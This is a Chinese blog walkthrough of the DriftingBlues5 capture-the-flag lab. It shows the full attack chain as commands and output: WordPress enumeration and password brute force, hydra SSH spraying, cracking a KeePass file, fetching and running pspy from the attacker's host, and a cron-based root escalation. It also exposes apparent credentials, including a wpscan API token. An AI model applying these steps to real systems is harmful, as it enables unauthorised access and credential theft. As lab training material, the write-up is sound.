guayu-kakeru
0%

HMV-Driftingblues5

发表于 分类于

HMV-Driftingblues5靶场复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -p- 192.168.64.174
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-06 18:11 CST
Nmap scan report for bogon (192.168.64.174)
Host is up (0.067s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)

就开放了这两个常用的端口,所以直接扫web目录

web探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.64.174                                                    
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.64.174/_25-04-06_18-12-11.txt

Target: http://192.168.64.174/

[18:12:11] Starting: 
[18:12:14] 403 -  279B  - /.ht_wsr.txt                                      
[18:12:14] 403 -  279B  - /.htaccess.bak1                                   
[18:12:14] 403 -  279B  - /.htaccess.sample                                 
[18:12:14] 403 -  279B  - /.htaccess.save
[18:12:14] 403 -  279B  - /.htaccess.orig
[18:12:14] 403 -  279B  - /.htaccessBAK                                     
[18:12:14] 403 -  279B  - /.htaccess_extra
[18:12:14] 403 -  279B  - /.htaccessOLD
[18:12:14] 403 -  279B  - /.htaccess_sc
[18:12:14] 403 -  279B  - /.htaccess_orig
[18:12:14] 403 -  279B  - /.htaccessOLD2                                    
[18:12:14] 403 -  279B  - /.html                                            
[18:12:14] 403 -  279B  - /.htm
[18:12:14] 403 -  279B  - /.htpasswd_test                                   
[18:12:14] 403 -  279B  - /.htpasswds
[18:12:14] 403 -  279B  - /.httr-oauth
[18:12:15] 403 -  279B  - /.php                                             
[18:12:26] 301 -    0B  - /index.php  ->  http://192.168.64.174/            
[18:12:26] 404 -   10KB - /index.php/login/                                 
[18:12:27] 200 -    7KB - /license.txt                                      
[18:12:33] 200 -    3KB - /readme.html                                      
[18:12:34] 403 -  279B  - /server-status/                                   
[18:12:34] 403 -  279B  - /server-status                                    
[18:12:37] 301 -  319B  - /wp-admin  ->  http://192.168.64.174/wp-admin/    
[18:12:37] 301 -  321B  - /wp-content  ->  http://192.168.64.174/wp-content/
[18:12:37] 500 -    0B  - /wp-admin/                                        
[18:12:37] 200 -    0B  - /wp-content/
[18:12:37] 200 -  477B  - /wp-content/uploads/                              
[18:12:37] 200 -  481B  - /wp-content/upgrade/                              
[18:12:37] 500 -    0B  - /wp-admin/admin-ajax.php                          
[18:12:37] 500 -    0B  - /wp-config.php
[18:12:37] 500 -    0B  - /wp-content/plugins/hello.php
[18:12:37] 200 -   84B  - /wp-content/plugins/akismet/akismet.php           
[18:12:37] 301 -  322B  - /wp-includes  ->  http://192.168.64.174/wp-includes/
[18:12:37] 200 -    0B  - /wp-includes/rss-functions.php                    
[18:12:38] 200 -    4KB - /wp-includes/                                     
[18:12:38] 500 -    0B  - /wp-cron.php                                      
[18:12:38] 500 -    0B  - /wp-admin/install.php                             
[18:12:38] 500 -    0B  - /wp-login.php                                     
[18:12:38] 500 -    0B  - /wp-signup.php                                    
[18:12:38] 500 -    0B  - /wp-admin/setup-config.php                        
[18:12:38] 500 -    0B  - /xmlrpc.php

扫出的目录和wordpress相关,所以直接用wpscan扫一下用户名和插件,但是这里因为靶机很老,所以尽量不要用插件的漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --url 192.168.64.174 --api-token lbD2jRa091DWey2uosBWjfXVj7aZzGayIssDaIuPQSU --enumerate u,ap  --plugins-detection aggressive

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:09:58 <=============================> (109869 / 109869) 100.00% Time: 00:09:58
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.64.174/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://192.168.64.174/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.64.174/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.1.8 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.64.174/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.64.174/wp-content/plugins/akismet/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=====================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.64.174/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Sun Apr  6 18:28:22 2025
[+] Requests Done: 109915
[+] Cached Requests: 42
[+] Data Sent: 29.409 MB
[+] Data Received: 15.111 MB
[+] Memory used: 429.746 MB
[+] Elapsed time: 00:10:08

把扫到的用户名存起来
然后这里是我卡住的一个点,因为用常见的字典的话,用户名还多,爆破起来的时间就特别多,这里看了wp学到了crewl这个工具,这个工具是利用网页上的信息来生成一个字典

1
2
3
4
5
6
7
8
┌──(root㉿kakeru)-[~/tmp]
└─# cewl -d 2 -m 6 -w pass.txt -with-numbers 192.168.64.174
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(root㉿kakeru)-[~/tmp]
└─# cat pass.txt | wc -l
937

可以看到这样子生成的字典就只有937
然后可以找到一个用户名和密码,但是没有什么用 后面会说到

1
2
3
4
5
6
7

┌──(root㉿kakeru)-[~/tmp]
└─# wpscan --url 192.168.64.174 -U a.txt -P pass.txt 

[+] Performing password attack on Wp Login against 6 user/s
[SUCCESS] - gill / interchangeable                                                                                 
Trying  / Author Time: 00:05:18 <=====================================        > (5055 / 5991) 84.37%  ETA: ??:??:??


这里是第二个卡住我的点,登录上来之后,没有找到有用的信息或者什么可以利用php反弹bash的地方
这里要用到的是dblogo这个图片

但是这个图片也可以在wp-content/wp-upload这个页面直接得到,所以我说这个用户名和密码没有什么用
然后把可疑的图片下载下来之后用exiftool分析一下,发现有一个ssh密码的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(root㉿kakeru)-[~/tmp]
└─# exiftool dblogo.png 
ExifTool Version Number         : 13.00
File Name                       : dblogo.png
Directory                       : .
File Size                       : 19 kB
File Modification Date/Time     : 2025:04:06 18:43:24+08:00
File Access Date/Time           : 2025:04:06 18:45:07+08:00
File Inode Change Date/Time     : 2025:04:06 18:45:07+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 300
Image Height                    : 300
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Perceptual
Gamma                           : 2.2
Pixels Per Unit X               : 2835
Pixels Per Unit Y               : 2835
Pixel Units                     : meters
XMP Toolkit                     : Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39
Creator Tool                    : Adobe Photoshop CC 2018 (Windows)
Create Date                     : 2021:02:24 02:55:28+03:00
Metadata Date                   : 2021:02:24 02:55:28+03:00
Modify Date                     : 2021:02:24 02:55:28+03:00
Instance ID                     : xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
Document ID                     : adobe:docid:photoshop:7232d876-a1d0-044b-9604-08837143888b
Original Document ID            : xmp.did:5890be6c-649b-0248-af9b-19889727200c
Color Mode                      : RGB
ICC Profile Name                : sRGB IEC61966-2.1
Format                          : image/png
History Action                  : created, saved
History Instance ID             : xmp.iid:5890be6c-649b-0248-af9b-19889727200c, xmp.iid:562b80d4-fe12-8541-ae0c-6a21e7859405
History When                    : 2021:02:24 02:55:28+03:00, 2021:02:24 02:55:28+03:00
History Software Agent          : Adobe Photoshop CC 2018 (Windows), Adobe Photoshop CC 2018 (Windows)
History Changed                 : /
Text Layer Name                 : ssh password is 59583hello of course it is lowercase maybe not
Text Layer Text                 : ssh password is 59583hello of course it is lowercase maybe not :)
Document Ancestors              : adobe:docid:photoshop:871a8adf-5521-894c-8a18-2b27c91a893b
Image Size                      : 300x300
Megapixels                      : 0.090

密码59583hello 用hydra爆破一下 得到ssh的用户名和密码

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kakeru)-[~/tmp]
└─# hydra -L a.txt -p 59583hello ssh://192.168.64.174                    
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-06 18:45:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6/p:1), ~1 try per task
[DATA] attacking ssh://192.168.64.174:22/
[22][ssh] host: 192.168.64.174   login: gill   password: 59583hello
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-06 18:46:01

提权

还是上来先看一下有没有sudo或者suid 结果都没有

1
2
3
4
5
6
7
8
gill@driftingblues:~$ ls -al
total 24
drwxr-xr-x 4 gill gill 4096 Apr  6 05:45 .
drwxr-xr-x 3 root root 4096 Feb 24  2021 ..
drwx------ 3 gill gill 4096 Apr  6 05:45 .gnupg
-rwx------ 1 gill gill 2030 Feb 24  2021 keyfile.kdbx
drwx------ 2 gill gill 4096 Feb 24  2021 .ssh
-r-x------ 1 gill gill   32 Feb 24  2021 user.txt

有意思的是这个.kdbx文件,问一下ai,是一个 KeePass 2.x 版本的密码数据库文件,扩展名为 .kdbx。
KeePass 是一款开源的密码管理器,用来安全地保存各种账号密码。它使用**加密算法(如 AES)**来保护用户的数据。
这个类型的文件可以用john破解密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kakeru)-[~/tmp]
└─# keepass2john keyfile.kdbx > hash
                                                                                                                                                         
┌──(root㉿kakeru)-[~/tmp]
└─# john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre       (keyfile)     
1g 0:00:00:13 DONE (2025-04-06 20:10) 0.07496g/s 518.1p/s 518.1c/s 518.1C/s polly..better
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到密码后,安装一个查看keepass的工具

1
2
┌──(root㉿kakeru)-[~/tmp]
└─# apt install keepassxc

输入密码之后得到一些标题

然后这些也不是root的密码 ,后面的部分就很奇怪,不是正常思路可以想到的
先从本地拿一个pspy64看一下定时任务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.64.174 - - [06/Apr/2025 20:15:24] "GET /pspy64 HTTP/1.1" 200 -

gill@driftingblues:~$ wget 192.168.64.11/pspy64
--2025-04-06 07:15:22--  http://192.168.64.11/pspy64
Connecting to 192.168.64.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                 100%[=========================================================================>]   2.96M  1.01MB/s    in 2.9s    

2025-04-06 07:15:27 (1.01 MB/s) - ‘pspy64’ saved [3104768/3104768]

gill@driftingblues:~$ chmod +x pspy64

运行之后,发现有一个定时任务

1
2
3
4
5
6
7
8
2025/04/06 07:16:20 CMD: UID=0     PID=1      | /sbin/init 
2025/04/06 07:17:01 CMD: UID=0     PID=696    | /usr/sbin/CRON -f 
2025/04/06 07:17:01 CMD: UID=0     PID=695    | /usr/sbin/cron -f 
2025/04/06 07:17:01 CMD: UID=0     PID=697    | /usr/sbin/CRON -f 
2025/04/06 07:17:01 CMD: UID=0     PID=698    | /usr/sbin/CRON -f 
2025/04/06 07:17:01 CMD: UID=0     PID=699    | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly 
2025/04/06 07:17:01 CMD: UID=0     PID=700    | /bin/sh -c /root/key.sh 
2025/04/06 07:17:01 CMD: UID=0     PID=701    | /bin/ /root/key.sh

这里有一个/root/key.sh 这种脚本一般就是检测文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
gill@driftingblues:/$ ls -al
total 69
drwxr-xr-x 19 root root  4096 Feb 24  2021 .
drwxr-xr-x 19 root root  4096 Feb 24  2021 ..
lrwxrwxrwx  1 root root     7 Dec 17  2020 bin -> usr/bin
drwxr-xr-x  3 root root  4096 Dec 17  2020 boot
drwxr-xr-x 17 root root  3260 Apr  6 07:04 dev
drwxr-xr-x 73 root root  4096 Apr  6 07:04 etc
drwxr-xr-x  3 root root  4096 Feb 24  2021 home
lrwxrwxrwx  1 root root    31 Dec 17  2020 initrd.img -> boot/initrd.img-4.19.0-13-amd64
lrwxrwxrwx  1 root root    31 Dec 17  2020 initrd.img.old -> boot/initrd.img-4.19.0-13-amd64
drwx---rwx  2 root root  4096 Feb 24  2021 keyfolder
lrwxrwxrwx  1 root root     7 Dec 17  2020 lib -> usr/lib
lrwxrwxrwx  1 root root     9 Dec 17  2020 lib32 -> usr/lib32
lrwxrwxrwx  1 root root     9 Dec 17  2020 lib64 -> usr/lib64
lrwxrwxrwx  1 root root    10 Dec 17  2020 libx32 -> usr/libx32
drwx------  2 root root 16384 Dec 17  2020 lost+found
drwxr-xr-x  3 root root  4096 Dec 17  2020 media
drwxr-xr-x  2 root root  4096 Dec 17  2020 mnt
drwxr-xr-x  2 root root  4096 Dec 17  2020 opt
dr-xr-xr-x 88 root root     0 Apr  6 07:04 proc
drwx------  2 root root  4096 Feb 24  2021 root
drwxr-xr-x 18 root root   540 Apr  6 07:14 run
lrwxrwxrwx  1 root root     8 Dec 17  2020 sbin -> usr/sbin
drwxr-xr-x  2 root root  4096 Dec 17  2020 srv
dr-xr-xr-x 13 root root     0 Apr  6 07:04 sys
drwxrwxrwt  9 root root  1024 Apr  6 07:09 tmp
drwxr-xr-x 13 root root  4096 Dec 17  2020 usr
drwxr-xr-x 13 root root  4096 Dec 17  2020 var
lrwxrwxrwx  1 root root    28 Dec 17  2020 vmlinuz -> boot/vmlinuz-4.19.0-13-amd64
lrwxrwxrwx  1 root root    28 Dec 17  2020 vmlinuz.old -> boot/vmlinuz-4.19.0-13-amd64

到根目录下面,发现有一个keyfolder目录,下一步就是在这个目录里面创建文件,文件名就是keepass里面的标题,从后往前创建,这样能更快的找到
创建文件之后在用pspy64,看执行检测定时任务之后有没有什么变化
但是这里还有一个坑,上次的文件要删除,就是这个文件夹只能有一个文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
gill@driftingblues:/keyfolder$ ls
fracturedocean
gill@driftingblues:/keyfolder$ /home/gill/pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/04/06 07:24:20 CMD: UID=1000  PID=783    | /home/gill/pspy64 
2025/04/06 07:24:20 CMD: UID=0     PID=725    | 
2025/04/06 07:24:20 CMD: UID=0     PID=702    | 
2025/04/06 07:24:20 CMD: UID=1000  PID=675    | -bash 
2025/04/06 07:24:20 CMD: UID=1000  PID=674    | sshd: gill@pts/0     
2025/04/06 07:24:20 CMD: UID=1000  PID=661    | (sd-pam) 
2025/04/06 07:24:20 CMD: UID=1000  PID=660    | /lib/systemd/systemd --user 
2025/04/06 07:24:20 CMD: UID=0     PID=657    | sshd: gill [priv]    
2025/04/06 07:24:20 CMD: UID=0     PID=656    | 
2025/04/06 07:24:20 CMD: UID=33    PID=484    | /usr/sbin/apache2 -k start 
2025/04/06 07:24:20 CMD: UID=33    PID=483    | /usr/sbin/apache2 -k start 
2025/04/06 07:24:20 CMD: UID=33    PID=482    | /usr/sbin/apache2 -k start 
2025/04/06 07:24:20 CMD: UID=33    PID=481    | /usr/sbin/apache2 -k start 
2025/04/06 07:24:20 CMD: UID=33    PID=480    | /usr/sbin/apache2 -k start 
2025/04/06 07:24:20 CMD: UID=0     PID=477    | /usr/sbin/apache2 -k start 
2025/04/06 07:24:20 CMD: UID=106   PID=476    | /usr/sbin/mysqld 
2025/04/06 07:24:20 CMD: UID=0     PID=417    | /usr/sbin/sshd -D 
2025/04/06 07:24:20 CMD: UID=0     PID=409    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2025/04/06 07:24:20 CMD: UID=0     PID=388    | /lib/systemd/systemd-logind 
2025/04/06 07:24:20 CMD: UID=0     PID=384    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3 
2025/04/06 07:24:20 CMD: UID=104   PID=383    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2025/04/06 07:24:20 CMD: UID=0     PID=382    | /usr/sbin/rsyslogd -n -iNONE 
2025/04/06 07:24:20 CMD: UID=0     PID=381    | /usr/sbin/cron -f 
2025/04/06 07:24:20 CMD: UID=101   PID=356    | /lib/systemd/systemd-timesyncd 
2025/04/06 07:24:20 CMD: UID=0     PID=348    | 
2025/04/06 07:24:20 CMD: UID=0     PID=347    | 
2025/04/06 07:24:20 CMD: UID=0     PID=345    | 
2025/04/06 07:24:20 CMD: UID=0     PID=344    | 
2025/04/06 07:24:20 CMD: UID=0     PID=339    | 
2025/04/06 07:24:20 CMD: UID=0     PID=337    | 
2025/04/06 07:24:20 CMD: UID=0     PID=281    | 
2025/04/06 07:24:20 CMD: UID=0     PID=280    | 
2025/04/06 07:24:20 CMD: UID=0     PID=235    | /lib/systemd/systemd-udevd 
2025/04/06 07:24:20 CMD: UID=0     PID=220    | /lib/systemd/systemd-journald 
2025/04/06 07:24:20 CMD: UID=0     PID=187    | 
2025/04/06 07:24:20 CMD: UID=0     PID=186    | 
2025/04/06 07:24:20 CMD: UID=0     PID=184    | 
2025/04/06 07:24:20 CMD: UID=0     PID=153    | 
2025/04/06 07:24:20 CMD: UID=0     PID=116    | 
2025/04/06 07:24:20 CMD: UID=0     PID=114    | 
2025/04/06 07:24:20 CMD: UID=0     PID=113    | 
2025/04/06 07:24:20 CMD: UID=0     PID=111    | 
2025/04/06 07:24:20 CMD: UID=0     PID=110    | 
2025/04/06 07:24:20 CMD: UID=0     PID=109    | 
2025/04/06 07:24:20 CMD: UID=0     PID=108    | 
2025/04/06 07:24:20 CMD: UID=0     PID=106    | 
2025/04/06 07:24:20 CMD: UID=0     PID=59     | 
2025/04/06 07:24:20 CMD: UID=0     PID=50     | 
2025/04/06 07:24:20 CMD: UID=0     PID=49     | 
2025/04/06 07:24:20 CMD: UID=0     PID=48     | 
2025/04/06 07:24:20 CMD: UID=0     PID=30     | 
2025/04/06 07:24:20 CMD: UID=0     PID=29     | 
2025/04/06 07:24:20 CMD: UID=0     PID=28     | 
2025/04/06 07:24:20 CMD: UID=0     PID=27     | 
2025/04/06 07:24:20 CMD: UID=0     PID=26     | 
2025/04/06 07:24:20 CMD: UID=0     PID=25     | 
2025/04/06 07:24:20 CMD: UID=0     PID=24     | 
2025/04/06 07:24:20 CMD: UID=0     PID=23     | 
2025/04/06 07:24:20 CMD: UID=0     PID=22     | 
2025/04/06 07:24:20 CMD: UID=0     PID=21     | 
2025/04/06 07:24:20 CMD: UID=0     PID=20     | 
2025/04/06 07:24:20 CMD: UID=0     PID=19     | 
2025/04/06 07:24:20 CMD: UID=0     PID=18     | 
2025/04/06 07:24:20 CMD: UID=0     PID=17     | 
2025/04/06 07:24:20 CMD: UID=0     PID=16     | 
2025/04/06 07:24:20 CMD: UID=0     PID=15     | 
2025/04/06 07:24:20 CMD: UID=0     PID=14     | 
2025/04/06 07:24:20 CMD: UID=0     PID=13     | 
2025/04/06 07:24:20 CMD: UID=0     PID=12     | 
2025/04/06 07:24:20 CMD: UID=0     PID=11     | 
2025/04/06 07:24:20 CMD: UID=0     PID=10     | 
2025/04/06 07:24:20 CMD: UID=0     PID=9      | 
2025/04/06 07:24:20 CMD: UID=0     PID=8      | 
2025/04/06 07:24:20 CMD: UID=0     PID=6      | 
2025/04/06 07:24:20 CMD: UID=0     PID=4      | 
2025/04/06 07:24:20 CMD: UID=0     PID=3      | 
2025/04/06 07:24:20 CMD: UID=0     PID=2      | 
2025/04/06 07:24:20 CMD: UID=0     PID=1      | /sbin/init 
2025/04/06 07:25:01 CMD: UID=0     PID=790    | /usr/sbin/CRON -f 
2025/04/06 07:25:01 CMD: UID=0     PID=791    | /usr/sbin/CRON -f 
2025/04/06 07:25:01 CMD: UID=0     PID=792    | /bin/sh -c /root/key.sh 
2025/04/06 07:25:01 CMD: UID=0     PID=793    | /bin/bash /root/key.sh 
2025/04/06 07:25:03 CMD: UID=0     PID=794    | 
^CExiting program... (interrupt)
gill@driftingblues:/keyfolder$ ls
fracturedocean	rootcreds.txt
gill@driftingblues:/keyfolder$ cat rootcreds.txt 
root creds

imjustdrifting31

倒数第二个文件是符合条件的,运行那个定时任务之后,在这个文件夹会出现一个新文件,里面是root的密码

总结

这个靶机的提权后面的部分太跳脱了,一般思路根本想不到,不看wp感觉我永远想不到要在这个文件夹里面创建文件,而且还要只能存在一个文件

  • wpscan 得到用户名
  • 学习cewl字典工具,学习这个工具的常用参数,在外国靶机上常用
  • 有明显不同的图片看看其中有没有多余的信息
  • 知道.kdbx文件类型 可以用keepass2john破解 用keepassxc工具打开